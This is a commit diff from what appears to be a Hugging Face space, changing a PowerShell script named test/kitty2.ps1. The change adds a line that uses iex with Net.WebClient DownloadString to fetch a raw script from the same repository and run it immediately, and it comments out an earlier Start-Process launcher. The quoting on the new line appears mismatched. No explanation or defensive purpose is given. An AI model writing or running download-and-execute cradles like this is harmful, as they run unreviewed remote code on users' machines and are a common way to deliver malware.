enotkrutoy commited on
Commit
6009887
·
verified ·
1 Parent(s): 0996e89

Update test/kitty2.ps1

Browse files
Files changed (1) hide show
  1. test/kitty2.ps1 +2 -1
test/kitty2.ps1 CHANGED
@@ -6,7 +6,8 @@
6
 
7
  if($host.Name -ne "ConsoleHost")
8
  {
9
- Start-Process powershell -ArgumentList '-noprofile -noexit -command iex (New-Object Net.WebClient).DownloadString(''https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1'')'
 
10
  return
11
  }
12
 
 
6
 
7
  if($host.Name -ne "ConsoleHost")
8
  {
9
+ #Start-Process powershell -ArgumentList '-noprofile -noexit -command iex (New-Object Net.WebClient).DownloadString(''https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty2.ps1'')'
10
+ iex (New-Object Net.WebClient).DownloadString(''https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty2.ps1'')'
11
  return
12
  }
13